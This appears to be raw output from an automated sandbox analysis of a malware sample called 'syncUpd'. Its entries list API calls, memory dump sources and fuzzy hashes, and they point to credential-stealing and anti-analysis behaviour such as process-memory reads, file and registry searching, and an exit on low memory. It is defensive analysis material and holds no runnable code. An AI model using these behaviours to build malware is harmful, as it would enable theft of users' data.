                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00903E46
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00903E74
                                                                                                                                                                                                                                                                • Part of subcall function 00903AF7: strlen.MSVCRT ref: 00903B08
                                                                                                                                                                                                                                                                • Part of subcall function 00903AF7: strlen.MSVCRT ref: 00903B2C
                                                                                                                                                                                                                                                              • VirtualQueryEx.KERNEL32(00904234,00000000,?,0000001C), ref: 00903EB9
                                                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 00903FDA
                                                                                                                                                                                                                                                                • Part of subcall function 00903D07: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00903D1F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                              • API String ID: 2950663791-2766056989
                                                                                                                                                                                                                                                              • Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                                                              • Instruction ID: 4ece867f8317fd28a5a64a847710475a487b19e91fa39121273d8fb0453cf012
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0651C8B5E0010AAFDB04CF94D995AEFB7B9FF88300F14C519FA15A7280D735AA11CBA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00964928), ref: 0041244B
                                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00412471
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00412490
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004124A4
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0095FFC8), ref: 004124B7
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004124CB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00964F48), ref: 004124DF
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                                                • Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                                                                                                                                • Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                                                                                                                                • Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
                                                                                                                                                                                                                                                                • Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 167551676-0
                                                                                                                                                                                                                                                              • Opcode ID: acc70cf36dbfec09d389d1ed2ea4429dda18c407074bb3bf1997155f4afc4f64
                                                                                                                                                                                                                                                              • Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: acc70cf36dbfec09d389d1ed2ea4429dda18c407074bb3bf1997155f4afc4f64
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624B00), ref: 009026B2
                                                                                                                                                                                                                                                                • Part of subcall function 00905747: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00905772
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 009026D8
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 009026F7
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0090270B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624A80), ref: 0090271E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00902732
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624AC0), ref: 00902746
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 009056F7: GetFileAttributesA.KERNEL32(00000000,?,008F1CAB,?,?,004215E4,?,?,0041D7E2), ref: 00905706
                                                                                                                                                                                                                                                                • Part of subcall function 00902457: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00902467
                                                                                                                                                                                                                                                                • Part of subcall function 00902457: RtlAllocateHeap.NTDLL(00000000), ref: 0090246E
                                                                                                                                                                                                                                                                • Part of subcall function 00902457: wsprintfA.USER32 ref: 0090248A
                                                                                                                                                                                                                                                                • Part of subcall function 00902457: FindFirstFileA.KERNEL32(?,?), ref: 009024A1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2540262943-0
                                                                                                                                                                                                                                                              • Opcode ID: b61a0952c10ec22559f8ff21dd1990cb91526dcb0d4337808e705547aad6b932
                                                                                                                                                                                                                                                              • Instruction ID: abdf27d5574ece2c8df4e15cc14eac61412b1a6505f8bc009e6f23714f642e5c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b61a0952c10ec22559f8ff21dd1990cb91526dcb0d4337808e705547aad6b932
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E93158B29006186BCB24F7B0DC89FEE737DAF98700F444589B7559A091DE749789CFA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008F1465
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 008F147F
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 008F148D
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 008F14BB
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                              • API String ID: 3404098578-2766056989
                                                                                                                                                                                                                                                              • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                                              • Instruction ID: 4c687236334085cfd370117820d2a8106ee71aef91639d7f84f85d199932adf2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55011DB094030CFAEF10DBE0DD49BADBAB9FBA4705F248058E705B61C0D77499458B69
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F228
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F36D
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0095C850,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 348468850-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0095C850,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                                                                                                                                                                                                                              • String ID: @$v10
                                                                                                                                                                                                                                                              • API String ID: 1400469952-24753345
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CodeInfoPageValidmemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 703783727-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 004129BA
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D888), ref: 004129D7
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0095DC70), ref: 004129EB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D88C), ref: 004129FD
                                                                                                                                                                                                                                                                • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                                • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                                                • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                                                • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                                                • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                                                                                                                              • String ID: L0A
                                                                                                                                                                                                                                                              • API String ID: 2667927680-1482484291
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(0041D8AC,?,?,004137D1,00000000,?,0095C850,?,0041D8AC,?,00000000,?), ref: 0041362C
                                                                                                                                                                                                                                                              • sscanf.NTDLL ref: 00413659
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(0041D8AC,00000000,?,?,?,?,?,?,?,?,?,?,?,0095C850,?,0041D8AC), ref: 00413672
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0095C850,?,0041D8AC), ref: 00413680
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041369A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Time$System$File$ExitProcesssscanf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2533653975-0
                                                                                                                                                                                                                                                              • Opcode ID: 8c2208981a801284f9a28e2d75357d0f51d698fa75f1db0b96360f0b24201e4d
                                                                                                                                                                                                                                                              • Instruction ID: a268315634fda69ed0a537ef202e87298384d27024bdd5aae2ec85167a5c17e0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c2208981a801284f9a28e2d75357d0f51d698fa75f1db0b96360f0b24201e4d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6421BA75D14209ABCB14EFE4D945AEEB7BABF4C305F04852EE50AE3250EB345644CB68
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(?), ref: 00903893
                                                                                                                                                                                                                                                              • sscanf.NTDLL ref: 009038C0
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009038D9
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009038E7
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00903901
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Time$System$File$ExitProcesssscanf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2533653975-0
                                                                                                                                                                                                                                                              • Opcode ID: 3210208c9ff9191fbd103aa9c2d0b3e8e7c47af46a118988f5807df95a5cb685
                                                                                                                                                                                                                                                              • Instruction ID: 1c16d3c2a14becf866bc1d02a36279e78b6ec33cf07aa73e5aa5bae966867787
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3210208c9ff9191fbd103aa9c2d0b3e8e7c47af46a118988f5807df95a5cb685
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A21CBB5D04209AFCF14EFE4D945AEEB7BABF8C300F04852EE516A3250EB346604CB65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00964850,?,?,?,0040F76C,?,00964850,00000000), ref: 0041596C
                                                                                                                                                                                                                                                              • lstrcpyn.KERNEL32(00625310,00964850,00964850,?,0040F76C,?,00964850), ref: 00415990
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,0040F76C,?,00964850), ref: 004159A7
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004159C7
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: %s%s
                                                                                                                                                                                                                                                              • API String ID: 1206339513-3252725368
                                                                                                                                                                                                                                                              • Opcode ID: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                                                              • Instruction ID: ad4ab28855ecf1822f83189248f4f970b5300654cb1d5d0a0ffaf2e78bbea45f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69015A75510908FFCB14DFA8D948EAE7BB9FF88344F108588F90A9B340CA71AA40CB94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                                                              • Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                                              • Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008F14DB
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008F14E2
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008F14FE
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008F151C
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 008F1526
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3225020163-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009049BB
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 009049C2
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,006249D0,00000000,00020119,00000000), ref: 009049E2
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,00624CD0,00000000,00000000,000000FF,000000FF), ref: 00904A03
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00904A0D
